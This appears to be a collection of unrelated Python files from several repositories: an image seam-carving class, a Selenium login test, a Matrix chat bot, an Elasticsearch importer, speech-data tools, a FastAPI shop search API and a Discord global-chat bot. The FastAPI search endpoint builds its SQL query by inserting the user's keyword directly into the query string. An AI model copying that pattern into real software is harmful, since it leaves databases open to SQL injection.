                    min_energy = M[i - 1, idx + j]
                else:
                    idx = np.argmin(M[i - 1, j - 1:j + 2])
                    backtrack[i, j] = idx + j - 1
                    min_energy = M[i - 1, idx + j - 1]
                M[i, j] += min_energy
        return M, backtrack


class Carve(Seam):

    def __init__(self, filter_du, filter_dv, img, scale):
        Seam.__init__(self, filter_du, filter_dv, img)
        self.scale = scale

    @numba.jit
    def carve_column(self):
        r, c, _ = self.img.shape
        M, backtrack = self.minimum_seam()
        mask = np.ones((r, c), dtype=np.bool)
        j = np.argmin(M[-1])
        for i in reversed(range(r)):
            # Mark the pixels for deletion
            mask[i, j] = False
            j = backtrack[i, j]
        mask = np.stack([mask] * 3, axis=2)
        self.img = self.img[mask].reshape((r, c - 1, 3))
        return self.img

    def reduceWidth(self):
        r, c, _ = self.img.shape
        new_c = c - self.scale
        for i in trange(c - new_c):  # use range if you don't want to use tqdm
            self.img = self.carve_column()
        return self.img

    def reduceHeight(self):
        self.img = np.rot90(self.img, 1, (0, 1))
        self.img = self.reduceWidth()
        self.img = np.rot90(self.img, 3, (0, 1))
        return self.img


class CarveFirstSeam(Seam):

    def __init__(self, filter_du, filter_dv, img, scale):
        Seam.__init__(self, filter_du, filter_dv, img)
        self.scale = scale

    @numba.jit
    def show_seam_line(self):
        r, c, _ = self.img.shape
        M, backtrack = self.minimum_seam()
        mask = np.ones((r, c), dtype=np.bool)
        j = np.argmin(M[-1])
        for i in reversed(range(r)):
            mask[i, j] = False
            j = backtrack[i, j]
        mask = np.stack([mask] * 3, axis=2)
        for i in range(r):
            for j in range(c):
                # for k in range(3):
                # we only check the first element of the mask, since the array is the same in the other 2 dimensions
                if mask[i][j][0] == False:
                    self.img[i][j][0] = 255
                    self.img[i][j][1] = 0
                    self.img[i][j][2] = 0
        # imwrite(self.out_name, self.img)
        # plt.imshow(self.img)
        return self.img

    def showSeamWidth(self):
        r, c, _ = self.img.shape
        new_c = c - self.scale
        for i in trange(c - new_c):  # use range if you don't want to use tqdm
            self.img = self.show_seam_line()
        plt.imshow(self.img)
        return self.img

    def showSeamHeight(self):
        self.img = np.rot90(self.img, 1, (0, 1))
        self.img = self.showSeamWidth()
        self.img = np.rot90(self.img, 3, (0, 1))
        plt.imshow(self.img)
        return self.img
```
{ "source": "8-god-cross-sea/PHL-Automated-UI-Test", "score": 3 }
#### File: PHL-Automated-UI-Test/Tests/SmokeTest_Login.py
```python
import unittest
import time

from selenium import webdriver


class SmokeTest_Login(unittest.TestCase):

    def setUp(self):
        self.driver = webdriver.Chrome()

    def tearDown(self):
        self.driver.close()

    def test_login_as_Administrator(self):
        driver = self.driver
        driver.get("http://phl.kaitohh.com/login.html")
        time.sleep(5)
        UsernameEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[1]/input")
        UsernameEdit.text = "Admin"
        PasswordEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[2]/input")
        PasswordEdit.send_keys("<PASSWORD>")
        SignInButton = driver.find_element_by_xpath("//*[@id=\"loginBTN\"]")
        SignInButton.click()
        # Assertion
        # should be logged in as administrator

    def test_login_as_User(self):
        driver = self.driver
        driver.get("http://phl.kaitohh.com/login.html")
        time.sleep(5)
        UsernameEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[1]/input")
        UsernameEdit.text = "User"
        PasswordEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[2]/input")
        PasswordEdit.send_keys("<PASSWORD>")
        SignInButton = driver.find_element_by_xpath("//*[@id=\"loginBTN\"]")
        SignInButton.click()
        # Assertion
        # should be logged in as User
```
{ "source": "8go/tiny-matrix-bot", "score": 2 }
#### File: 8go/tiny-matrix-bot/tiny-matrix-bot.py
```python
import os
import re
import sys
import logging
import traceback
import argparse
import subprocess
import configparser
from time import sleep
from matrix_client.client import MatrixClient


class TinyMatrixtBot():
    """This class implements a tiny Matrix bot.
    It also can be used to send messages from the CLI as proxy for the bot.
    """

    def __init__(self, pargs):
        root_path = os.path.dirname(os.path.realpath(__file__))
        self.config = configparser.ConfigParser()
        if "CONFIG" in os.environ:
            config_path = os.environ["CONFIG"]
        else:
            config_path = os.path.join(root_path, "tiny-matrix-bot.cfg")
        self.config.read(config_path)
        self.base_url = self.config.get("tiny-matrix-bot", "base_url")
        self.token = self.config.get("tiny-matrix-bot", "token")
        self.connect()
        logger.debug("arguments {}".format(pargs))
        logger.debug("client rooms {}".format(self.client.rooms))
        if pargs.room:
            if pargs.room not in self.client.rooms:
                logger.info(
                    "Provided room argument is not in client rooms. Exiting ...")
                sys.exit(1)
            if pargs.message:
                text = pargs.message
                logger.debug("Provided message argument \"{}\".".format(text))
            else:
                text = sys.stdin.read()  # read message from stdin
            logger.debug("sending message to {}".format(pargs.room))
            if pargs.code:
                logger.debug("sending message in format {}".format("code"))
                self.client.rooms[pargs.room].send_html(
                    "<pre><code>" + text + "</code></pre>")
            elif pargs.html:
                logger.debug("sending message in format {}".format("html"))
                self.client.rooms[pargs.room].send_html(text)
            else:
                logger.debug("sending message in format {}".format("text"))
                self.client.rooms[pargs.room].send_text(text)
            logger.debug("message sent, now exiting")
            sys.exit(0)
        run_path = self.config.get(
            "tiny-matrix-bot", "run_path",
            fallback=os.path.join(root_path, "run"))
        os.chdir(run_path)
        scripts_path = self.config.get(
            "tiny-matrix-bot", "scripts_path",
            fallback=os.path.join(root_path, "scripts"))
        enabled_scripts = self.config.get(
            "tiny-matrix-bot", "enabled_scripts", fallback=None)
        self.scripts = self.load_scripts(scripts_path, enabled_scripts)
        self.inviter = self.config.get(
            "tiny-matrix-bot", "inviter", fallback=None)
        self.client.add_invite_listener(self.on_invite)
        self.client.add_leave_listener(self.on_leave)
        for room_id in self.client.rooms:
            self.join_room(room_id)
        self.client.start_listener_thread(
            exception_handler=lambda e: self.connect())
        while True:
            sleep(0.5)

    def connect(self):
        try:
            # downgraded this from info to debug, because if this program is used by other
            # automated scripts for sending messages then this extra output is undesirable
            logger.debug("connecting to {}".format(self.base_url))
            self.client = MatrixClient(self.base_url, token=self.token)
            # same here, downgrade from info to debug, to avoid output for normal use
            # cases in other automated scripts
            logger.debug("connection established")
        except Exception:
            logger.warning(
                "connection to {} failed".format(self.base_url) +
                ", retrying in 5 seconds...")
            sleep(5)
            self.connect()

    def load_scripts(self, path, enabled):
        scripts = []
        for script_name in os.listdir(path):
            script_path = os.path.join(path, script_name)
            if enabled:
                if script_name not in enabled:
                    logger.debug("script {} is not enabled".format(script_name))
                    continue
            if (not os.access(script_path, os.R_OK) or
                    not os.access(script_path, os.X_OK)):
                logger.debug("script {} is not executable".format(script_name))
                continue
            # the .copy() is extremely important, leaving it out is a major bug
            # as variables from the config file will then be constantly overwritten!
            script_env = os.environ.copy()
            script_env["CONFIG"] = "1"
            logger.debug("script {} with script_env {}".format(
                script_name, script_env))
            script_regex = subprocess.Popen(
                [script_path],
                env=script_env,
                stdout=subprocess.PIPE,
                universal_newlines=True
            ).communicate()[0].strip()
            if not script_regex:
                logger.debug("script {} has no regex".format(script_name))
                continue
            del script_env["CONFIG"]
            if self.config.has_section(script_name):
                for key, value in self.config.items(script_name):
                    script_env["__" + key] = value
                    logger.debug(
                        "add key-value pair key {} to script_env".format(key))
                    logger.debug(
                        "add key-value pair value {} to script_env".format(value))
            script = {
                "name": script_name,
                "path": script_path,
                "regex": script_regex,
                "env": script_env
            }
            scripts.append(script)
            logger.info("script {}".format(script["name"]))
        logger.debug("all scripts {}".format(scripts))
        return scripts

    def on_invite(self, room_id, state):
        sender = "someone"
        for event in state["events"]:
            if event["type"] != "m.room.join_rules":
                continue
            sender = event["sender"]
            break
        logger.info("invited to {} by {}".format(room_id, sender))
        if self.inviter:
            if not re.search(self.inviter, sender):
                logger.info(
                    "{} is not inviter, ignoring invite".format(sender))
                return
        self.join_room(room_id)

    def join_room(self, room_id):
        logger.info("join {}".format(room_id))
        room = self.client.join_room(room_id)
        room.add_listener(self.on_room_event)

    def on_leave(self, room_id, state):
        sender = "someone"
        for event in state["timeline"]["events"]:
            if not event["membership"]:
                continue
            sender = event["sender"]
        logger.info("kicked from {} by {}".format(room_id, sender))

    def on_room_event(self, room, event):
        if event["sender"] == self.client.user_id:
            logger.debug(
                "event from sender (itself) {}".format(event["sender"]))
            return
        # ignore encrypted messages, but log them in debug mode
        if event["type"] == "m.room.encrypted":
            logger.debug(
                "event type (m.room.encrypted) {}".format(event["type"]))
            logger.debug("sender_key (m.content.sender_key) {}".format(
                event["content"]["sender_key"]))
            logger.debug("ciphertext (m.content.ciphertext) {}".format(
                event["content"]["ciphertext"]))
            return
        if event["type"] != "m.room.message":
            logger.debug(
                "event of type (!=room.message) {}".format(event["type"]))
            return
        # only plain text messages are processed, everything else is ignored
        if event["content"]["msgtype"] != "m.text":
            logger.debug("event of msgtype (!=m.text) {}".format(
                event["content"]["msgtype"]))
            return
        args = event["content"]["body"].strip()
        logger.debug("args {}".format(args))
        for script in self.scripts:
            # multiple scripts can match regex, multiple scripts can be kicked off
            if not re.search(script["regex"], args, re.IGNORECASE):
                continue
            self.run_script(room, event, script, args)

    def run_script(self, room, event, script, args):
        script["env"]["__room_id"] = event["room_id"]
        script["env"]["__sender"] = event["sender"]
        if "__whitelist" in script["env"]:
            if not re.search(script["env"]["__whitelist"],
                             event["room_id"] + event["sender"]):
                logger.debug(
                    "script {} not whitelisted".format(script["name"]))
                return
        if "__blacklist" in script["env"]:
            if re.search(script["env"]["__blacklist"],
                         event["room_id"] + event["sender"]):
                logger.debug("script {} blacklisted".format(script["name"]))
                return
        logger.debug("script {} run with env {}".format(
            [script["name"], args], script["env"]))
        run = subprocess.Popen(
            [script["path"], args],
            env=script["env"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            universal_newlines=True
        )
        # output = run.communicate()[0].strip()
        output, std_err = run.communicate()
        output = output.strip()
        std_err = std_err.strip()
        if run.returncode != 0:
            logger.debug("script {} exited with return code {} and " +
                         "stderr as \"{}\" and stdout as \"{}\"".format(
                             script["name"], run.returncode, std_err, output))
            output = "*** Error: script " + script["name"] + " returned error code " + str(
                run.returncode) + ". ***\n" + std_err + "\n" + output
            # return  # don't return on error, also print any available output
        sleep(0.1)
        # higher up programs or scripts have two options:
        # Text with a single or a double linebreak (i.e. one empty line) stays together
        # in a single messages, allowing one to write longer messages and structure
        # them clearly with separating whitespace (an empty line).
        # When two empty lines are found, the text is split up in multiple messages.
        # That allows a single call to a script to generate multiple independent messages.
        # In short, everything with 1 or 2 linebreaks stays together, wherever there are 3
        # linebreaks the text is split into 2 or multiple messages.
        for p in output.split("\n\n\n"):
            for line in p.split("\n"):
                logger.debug(
                    "script {} output {}".format(script["name"], line))
            # strip again to get get rid of leading/trailing newlines and whitespaces
            # left over from previous split
            if p.strip() != "":
                if pargs.code:
                    room.send_html("<pre><code>" + p.strip() + "</code></pre>")
                elif ("__format" in script["env"]) and (script["env"]["__format"] == "code"):
                    room.send_html("<pre><code>" + p.strip() + "</code></pre>")
                elif pargs.html:
                    room.send_html(p.strip())
                elif ("__format" in script["env"]) and (script["env"]["__format"] == "html"):
                    room.send_html(p.strip())
                else:
                    room.send_text(p.strip())
                sleep(0.1)


if __name__ == "__main__":
    logging.basicConfig()  # initialize root logger, a must
    if "DEBUG" in os.environ:
        logging.getLogger().setLevel(logging.DEBUG)  # set log level on root logger
    else:
        logging.getLogger().setLevel(logging.INFO)  # set log level on root logger
    # Construct the argument parser
    ap = argparse.ArgumentParser(
        description="This program implements a simple Matrix bot.")
    # Add the arguments to the parser
    ap.add_argument("-d", "--debug", required=False, action="store_true",
                    help="Print debug information")
    ap.add_argument("-r", "--room", required=False,
                    help="Don't run bot. Just send a message to this bot-room. If --message is provided use that as message, if not provided read message from stdin.")
    ap.add_argument("-m", "--message", required=False,
                    help="Don't run bot. Just send this message to the specified bot-room. If not specified, message will be read from stdin.")
    # -h already used for --help, -w for "web"
    ap.add_argument("-w", "--html", required=False, action="store_true",
                    help="Send message(s) as format \"HTML\". If not specified, message will be sent as format \"TEXT\".")
    ap.add_argument("-c", "--code", required=False, action="store_true",
                    help="Send message(s) as format \"CODE\". If not specified, message will be sent as format \"TEXT\". If both --html and --code are specified then --code takes priority.")
    pargs = ap.parse_args()
    if pargs.debug:
        logging.getLogger().setLevel(logging.DEBUG)  # set log level on root logger
        logging.getLogger().info("Debug is turned on.")
    logger = logging.getLogger("tiny-matrix-bot")
    if pargs.message and (not pargs.room):
        logger.error(
            "If you provide a message you must also provide a room as destination for the message.")
        sys.exit(2)
    try:
        TinyMatrixtBot(pargs)
    except Exception:
        traceback.print_exc(file=sys.stdout)
        sys.exit(1)
    except KeyboardInterrupt:
        sys.exit(1)
```
{ "source": "8hk/AEK", "score": 3 }
#### File: AEK/annotator_tool/import_articles_to_elasticsearch.py
```python
import json
import os
import uuid
from datetime import datetime

from elasticsearch import Elasticsearch, helpers
from pymongo import MongoClient
import nltk

client = MongoClient(
    host=os.environ.get("MONGO_DB_HOST", " ") + ":" + os.environ.get("MONGO_DB_PORT", " "),  # <-- IP and port go here
    serverSelectionTimeoutMS=3000,  # 3 second timeout
    username=os.environ.get("MONGO_DB_USERNAME", " "),
    password=os.environ.get("MONGO_DB_PASSWORD", " "),
)
db = client[os.environ.get("MONGO_INITDB_DATABASE", " ")]


class ElasticSearchHandler(object):

    def __init__(self):
        self.already_inserted_detailed_article_id_list = []
        self.annotation_detail_column = db["annotated_article_ids"]
        self.get_detailed_article_ids_from_db()
        print("total ", len(self.already_inserted_detailed_article_id_list), "articles will be processed")
        self.start_importing()

    def bulk_json_data(self, json_list, _index, doc_type):
        for json in json_list:
            if '{"index"' not in json:
                yield {
                    "_index": _index,
                    "_type": doc_type,
                    "_id": uuid.uuid4(),
                    "_source": json
                }

    def get_detailed_article_ids_from_db(self):
        query = {}
        column = db["annotated_article_ids"]
        document = column.find(query)
        for x in document:
            list_item = dict(x)
            if list_item["id"] not in self.already_inserted_detailed_article_id_list:
                self.already_inserted_detailed_article_id_list.append(list_item["id"])

    def article_details_query(self, article_id):
        mongo_query = {}
        mongo_query["id"] = article_id
        document = self.annotation_detail_column.find(mongo_query)
        for x in document:
            list_item = dict(x)
            article_json = {
                "authors": list_item["author_list"],
                "keywords": list_item["top_three_keywords"],
                "abstract": list_item["abstract"].lower(),
                "article_date": list_item["article_date"],
                "article_id": list_item["id"],
                "_created": datetime.now()
            }
        del document
        del list_item
        return article_json

    def start_importing(self):
        article_json = []
        elastic = Elasticsearch(hosts=["es01"])
        while self.already_inserted_detailed_article_id_list:
            article_json.append(self.article_details_query(self.already_inserted_detailed_article_id_list.pop()))
        response = helpers.bulk(elastic, self.bulk_json_data(article_json, "test5", "doc"))
        print("\nRESPONSE:", response)
        print("op finished")


if __name__ == "__main__":
    now = datetime.now()
    start_time = now.strftime("%H:%M:%S")
    print("op started")
    handler = ElasticSearchHandler()
    finish_time = now.strftime("%H:%M:%S")
    print("start time: ", start_time)
    print("finish time: ", finish_time)
```

#### File: api/search/models.py
```python
from djongo import models


class AnnotatedArticle(models.Model):
    body_value = models.CharField(max_length=255)
    target = models.CharField(max_length=255, null=True)

    def __str__(self):
        return str(self.body_value)

    @property
    def sd(self):
        return {
            "@type": 'Annotation',
            "body": {
                "type": "Choice",
                "items": self.body_value
            }
        }


# """
# {
#     "@context": "http://www.w3.org/ns/anno.jsonld",
#     "id": <annotation id (incremental)>,
#     "type": "Annotation",
#     "body": [
#         {
#             "type": "Choice",
#             "source": "<ontology + concept id>",
#             "items": [
#                 {
#                     "type": "TextualBody",
#                     "value": "<synonym>"  # ontology concept label
#                 },
#                 {
#                     "type": "TextualBody",
#                     "value": "<synonym>"  # synonym 1
#                 },
#                 {
#                     "type": "TextualBody",
#                     "value": "<synonym>"  # synonym 2
#                 },
#                 {
#                     "type": "TextualBody",
#                     "value": "<synonym>"  # synonym n
#                 }
#             ]
#         }
#     ],
#     "target": {
#         "id": "<internal article id>",
#         "selector": {
#             "type": "TextPositionSelector",
#             "start": <start position in article>,
#             "end": <end position in article>
#         }
#     }
# }
# """
```

#### File: AEK/api/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render

from api.search import views
import requests

# Create your views here.


def aboutPage(request):
    dict = {}
    annotated_article_number = views.findArticleNumber()
    dict["article_number"] = annotated_article_number
    annotation_number = views.findAnnotationNumber()
    dict["annotation_number"] = annotation_number
    return render(request, 'html/about.html', {'metrics_data': dict})
```
{ "source": "8igfive/MyASR", "score": 3 }
#### File: MyASR/tools/make_segments_wavscp.py
```python
import os
import random


def make_segments_wav_scp(src_scp_path, segments_path, dst_scp_path):
    with open(src_scp_path, 'r', encoding='utf8') as fin:
        wavkey2path = dict(
            map(
                lambda x: x.strip().split(),
                fin.readlines()
            )
        )
    with open(segments_path, 'r', encoding='utf8') as fin:
        scpsegments = list(
            map(
                lambda x: '{} {},{},{}'.format(x[0], wavkey2path[x[1]], x[2], x[3]),
                filter(
                    lambda x: x[1] in wavkey2path,  # segKey, wavKey, start, end
                    map(
                        lambda x: x.strip().split(),
                        fin.readlines()
                    )
                )
            )
        )
    with open(dst_scp_path, 'w', encoding='utf8') as fout:
        fout.write('\n'.join(scpsegments))
    print('{} contain {} segments'.format(dst_scp_path, len(scpsegments)))
    print('segments are like: {}'.format(scpsegments[0]))


def sample(src_path, dst_path, devide_factor=None, num=50000):
    with open(src_path, 'r', encoding='utf8') as fin:
        srclines = list(map(lambda x: x.strip(), fin.readlines()))
    if devide_factor:
        dst_size = len(srclines) // devide_factor
    else:
        dst_size = num
    random.shuffle(srclines)
    dstlines = srclines[:dst_size]
    print('srclines={}, dstlines={}'.format(len(srclines), len(dstlines)))
    # print(dstlines[:10])
    with open(dst_path, 'w', encoding='utf8') as fout:
        fout.write('\n'.join(dstlines))


def count_lines(path):
    with open(path, 'r', encoding='utf8') as fin:
        lines = list(map(lambda x: x.strip(), fin.readlines()))
        # lines = fin.read().split('\n')
        print(lines[:3])
        return len(lines)


if __name__ == '__main__':
    # src_scp_path = '/home/LAB/qujy/open/wenet-main/examples/wenetspeech/s0/data/train_l/wav.scp'
    # segments_path = '/home/LAB/qujy/open/wenet-main/examples/wenetspeech/s0/data/train_l/segments'
    # dst_scp_path = 'egs/wenetspeech/data/train/wav.scp.segments'
    # make_segments_wav_scp(src_scp_path, segments_path, dst_scp_path)
    src_path = 'egs/wenetspeech/data/train/wav.scp.segments'
    dst_path = 'egs/wenetspeech/data/train/wav.scp.segments.sample_50000'
    sample(src_path, dst_path, num=50000)
    # count_lines(src_scp_path)
    # print(count_lines(dst_path))
```

#### File: MyASR/tools/noise_reduction.py
```python
import argparse
from genericpath import exists
import os
import time
import re
from tqdm import tqdm
import numpy as np
from scipy.io import wavfile
from wiener_scalart import wienerScalart

TIME = time.strftime("%Y-%m-%d_%H:%M:%S", time.localtime())
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
WORKPLACE_DIR = os.path.dirname(CURRENT_DIR)
DUMP_DIR = os.path.join(WORKPLACE_DIR, os.path.join('dump', TIME))
DUMP_FEAT = 'feat_{}.scp'.format(TIME)
DUMP_TEXT = 'text_{}'.format(TIME)
FEAT_FORMAT = r'\s?(.+?)\s+(.+?\.wav)'

intMap = {np.dtype('int8'): (0x7f, -0x80),
          np.dtype('int16'): (0x7fff, -0x8000),
          np.dtype('int32'): (0x7fffffff, -0x8000000),
          np.dtype('int64'): (0x7fffffffffffffff, -0x8000000000000000)}


def noise_reduct(args, filePath, dumpPath):
    sampleRate, musicData = wavfile.read(filePath)
    dataType = np.dtype('int16')
    musicData.dtype = dataType  # FIXME: the dtype of the data read by wavfile may be wrong
    if args.debug:
        print(min(musicData), max(musicData), intMap[dataType][0] + 1)
    if dataType in intMap:
        musicData = musicData / (intMap[dataType][0] + 1)
    if args.debug:
        print(min(musicData), max(musicData))
    newData = wienerScalart(musicData, sampleRate)
    if dataType in intMap:
        if args.debug:
            print(min(newData), max(newData))
        newData = newData * (intMap[dataType][0])
        newData = newData.astype(dataType)
        if args.debug:
            print(max(newData), min(newData))
    wavfile.write(dumpPath, sampleRate, newData)


def main(args):
    if args.feat is None or args.text is None:
        print('lack of feat file or text file')
        return
    if os.path.abspath(args.dumpFeat) != args.dumpFeat:
        args.dumpFeat = os.path.join(DUMP_DIR, args.dumpFeat)
    if os.path.abspath(args.dumpText) != args.dumpText:
        args.dumpText = os.path.join(DUMP_DIR, args.dumpText)
    if not os.path.exists(DUMP_DIR):
        os.makedirs(DUMP_DIR)
    with open(args.feat, 'r', encoding='utf8') as f:
        dataPairs = re.findall(FEAT_FORMAT, f.read())
    with open(args.dumpFeat, 'w', encoding='utf8') as f:
        for i in tqdm(range(len(dataPairs))):
            dataPair = dataPairs[i]
            pathList = os.path.split(dataPair[1])
            dumpPath = os.path.join(args.dumpDir, pathList[-1])
            f.write('{} {}\n'.format(dataPair[0], dumpPath))
            noise_reduct(args, dataPair[1], dumpPath)
    with open(args.text, 'r', encoding='utf8') as fin:
        with open(args.dumpText, 'w', encoding='utf8') as fout:
            fout.write(fin.read())


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--feat', type=str, default=None, help='feat file path')
    parser.add_argument('-t', '--text', type=str, default=None, help='text file path')
    parser.add_argument('-dd', '--dumpDir', type=str, default=DUMP_DIR, help='the directory where holds new .wav files')
    parser.add_argument('-df', '--dumpFeat', type=str, default=os.path.join(DUMP_DIR, DUMP_FEAT), help='dump feat file path')
    parser.add_argument('-dt', '--dumpText', type=str, default=os.path.join(DUMP_DIR, DUMP_TEXT), help='dump text file path')
    parser.add_argument('-n', '--noiseLength', type=float, default=0.25, help='the noise time length at the beggining of the audio')
    parser.add_argument('-db', '--debug', action='store_true', help='print debug message')
    args = parser.parse_args()
    main(args)
```
{ "source": "8igMac/webminer", "score": 3 }
#### File: 8igMac/webminer/main.py
```python
from fastapi import FastAPI
from typing import Optional
from enum import Enum
import mysql.connector as database


class Mysql:
    def __init__(self):
        db_conn_info = {
            'user': 'michael',
            'password': '<PASSWORD>',
            'host': 'localhost',
            'database': 'shop'
        }
        self.conn = database.connect(**db_conn_info)
        self.cur = self.conn.cursor()

    def add_data(self, name, rating, sales, price):
        try:
            statement = 'INSERT INTO items (name, rating, sales, price) VALUES (%s, %s, %s, %s)'
            data = (name, rating, sales, price)
            self.cur.execute(statement, data)
            self.conn.commit()
            # print('Sucessfully add data')  # debug
        except database.Error as e:
            print(f'Error adding entry to database: {e}')

    def get_data(self, name):
        try:
            statement = f"SELECT * FROM items WHERE name LIKE '{name}%'"
            self.cur.execute(statement)
            return self.cur.fetchall()
        except database.Error as e:
            print(f'Error getting entry to database: {e}')

    def __del__(self):
        self.conn.close()
        print('Connection closed')


app = FastAPI()
mysql = Mysql()


class SortOption(str, Enum):
    relevancy = 'relevancy'  # Todo: define relevancy.
    time = 'time'
    sales = 'sales'
    price = 'price'


class SortOrder(str, Enum):
    asc = 'asc'
    desc = 'desc'


@app.get('/')
async def read_main():
    return {'msg': 'Hello, World'}


@app.get('/search')
async def search(
    keyword: str,
    sort_by: Optional[SortOption] = None,
    order: Optional[SortOrder] = None,
):
    result = mysql.get_data(keyword)
    return result
    # return {
    #     'operation': 'search',
    #     'keyword': keyword,
    #     'sort_by': sort_by,
    #     'order': order,
    # }
```
{ "source": "8infy/AWML", "score": 3 }
#### File: 8infy/AWML/dependency_downloader.py
```python
import sys
import os
import urllib.request


def error_exit(why):
    print(f"-- Failed to install OpenGL dependencies! Reason: {why}")
    sys.exit(1)


if len(sys.argv) != 2:
    print("Usage: python dependency_downloader.py <project-include-path> \
\nPlease note that this script is meant to be executed with CMake and not manually!")
    sys.exit(1)

if not os.path.isdir(sys.argv[1]):
    error_exit(f"no such directory: {sys.argv[1]}")

try:
    print("-- Downloading OpenGL dependencies...")
    gl_path = os.path.join(sys.argv[1], "GL")
    khr_path = os.path.join(sys.argv[1], "KHR")
    os.mkdir(gl_path)
    os.mkdir(khr_path)
    urllib.request.urlretrieve("https://www.khronos.org/registry/OpenGL/api/GL/glcorearb.h", gl_path + "/glcorearb.h")
    urllib.request.urlretrieve("https://www.khronos.org/registry/OpenGL/api/GL/wglext.h", gl_path + "/wglext.h")
    urllib.request.urlretrieve("https://www.khronos.org/registry/EGL/api/KHR/khrplatform.h", khr_path + "/khrplatform.h")
except Exception as ex:
    error_exit(ex)

print("-- Successfully downloaded OpenGL dependencies.")
```
{ "source": "8ka1alu/heroku-global-py", "score": 2 }
#### File: heroku-global-py/cogs/gladd.py ```python import os import r from discord.ext import commands import discord class addglobal(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() @commands.has_permissions(manage_guild=True) async def add_global(self, ctx): """グローバルチャット登録""" cgi=ctx.guild.id cci=ctx.channel.id ccn=ctx.channel.name global_ch="gloch" conn=r.connect() k=conn.keys() gi=str(cgi) ci=str(cci) count=0 for i in k: #データベース判定 if i == gi: count+=1 if count==0: #データベース未登録時 a1=conn.sadd(cgi,cci) a2=conn.sadd(global_ch,cci) if a1==True and a2==True: embed = discord.Embed(title="**登録情報**", description=None,color=0x3498db) embed.add_field(name="登録完了", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**登録情報**", description=None,color=0x992d22) embed.add_field(name="登録失敗", value=f"`開発者に問い合わせて下さい`") return await ctx.send(embed=embed) elif count>0: sm=conn.smembers(cgi) counts=0 for ch in sm: if ch == ci: counts+=1 if counts==0: a1=conn.sadd(cgi,cci) a2=conn.sadd(global_ch,cci) if a1==True and a2==True: embed = discord.Embed(title="**登録情報**", description=None,color=0x3498db) embed.add_field(name="登録完了", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**登録情報**", description=None,color=0x992d22) embed.add_field(name="登録失敗", value=f"`開発者に問い合わせて下さい`") return await ctx.send(embed=embed) elif counts>0: embed = discord.Embed(title="**登録情報**", description=None,color=0x992d22) embed.add_field(name="既に登録されています。", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**エラー**", description="開発者に問い合わせて下さい",color=0x992d22) return await ctx.send(embed=embed) def setup(bot): bot.add_cog(addglobal(bot)) ``` #### File: heroku-global-py/cogs/gldel.py ```python import os import r from discord.ext import commands import discord class delglobal(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() @commands.has_permissions(manage_guild=True) async def del_global(self, ctx): """グローバルチャット登録解消""" cgi=ctx.guild.id cci=ctx.channel.id ccn=ctx.channel.name global_ch="gloch" conn=r.connect() k=conn.keys() gi=str(cgi) ci=str(cci) count=0 for i in k: if i == gi: count+=1 if count==0: embed = discord.Embed(title="**エラー**", description="登録がされていない鯖です",color=0x992d22) return await ctx.send(embed=embed) elif count>0: sm=conn.smembers(cgi) counts=0 for ch in sm: if ch == ci: counts+=1 if counts==0: embed = discord.Embed(title="**エラー**", description="このチャンネルは登録されていません",color=0x992d22) return await ctx.send(embed=embed) elif counts>0: a1=conn.srem(cgi, cci) a2=conn.srem(global_ch, cci) if a1==True and a2==True: embed = discord.Embed(title="**登録解消情報**", description=None,color=0xe74c3c) embed.add_field(name="登録を解消しました", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**エラー**", description="開発者に問い合わせて下さい`48`",color=0x992d22) return await ctx.send(embed=embed) else: embed = discord.Embed(title="**エラー**", description="開発者に問い合わせて下さい`51`",color=0x992d22) return await ctx.send(embed=embed) def setup(bot): bot.add_cog(delglobal(bot)) ``` #### File: 8ka1alu/heroku-global-py/discordbot.py ```python from discord.ext import commands, tasks # Bot Commands Frameworkをインポート import traceback # エラー表示のためにインポート import os import discord import r TOKEN = os.environ['DISCORD_BOT_TOKEN'] prefix = os.environ['DISCORD_BOT_PREFIX'] #プレフィックス # 読み込むコグの名前を格納しておく。 INITIAL_EXTENSIONS = [ 'cogs.eval', 'cogs.glchat', 'cogs.gladd', 
'cogs.gldel' ] # クラスの定義。ClientのサブクラスであるBotクラスを継承。 class MyBot(commands.Bot): # MyBotのコンストラクタ。 def __init__(self, command_prefix, help_command): # スーパークラスのコンストラクタに値を渡して実行。 super().__init__(command_prefix,help_command) # INITIAL_COGSに格納されている名前から、コグを読み込む。 # エラーが発生した場合は、エラー内容を表示。 for cog in INITIAL_EXTENSIONS: try: self.load_extension(cog) except Exception: traceback.print_exc() # Botの準備完了時に呼び出されるイベント async def on_ready(self): print(self.user.name) # ボットの名前 print(self.user.id) # ボットのID print(discord.__version__) # discord.pyのバージョン print('----------------') print('Hello World !!') await self.change_presence(status=discord.Status.idle,activity=discord.Game(name=f'Ping:{self.ws.latency * 1000:.0f}ms')) conn=r.connect() ky=conn.keys() global_ch="gloch" count=0 for i in ky: i=str(i) if i == global_ch: count+=1 if count>0: smsd=conn.smembers(global_ch) count=0 for q in smsd: q=str(q) if q=="0": count+=1 if count>0: p=conn.srem(global_ch,"0") if p==True: print("正常起動") else: print("異常発生") else: print(ky) else: p=conn.sadd(global_ch,"0") if p==True: print("正常起動") else: print("異常発生") class JapaneseHelpCommand(commands.DefaultHelpCommand): def __init__(self): super().__init__() self.commands_heading = "コマンド:" self.no_category = "その他" self.command_attrs["help"] = "コマンド一覧と簡単な説明を表示" def get_ending_note(self): return (f"各コマンドの説明: {prefix}help <コマンド名>\n" f"各カテゴリの説明: {prefix}help <カテゴリ名>\n") #MyBotのインスタンス化及び起動処理。 if __name__ == '__main__': bot = MyBot(command_prefix=prefix,help_command=JapaneseHelpCommand()) # command_prefixはコマンドの最初の文字として使うもの。 e.g. !ping bot.run(TOKEN) # Botのトークン ```
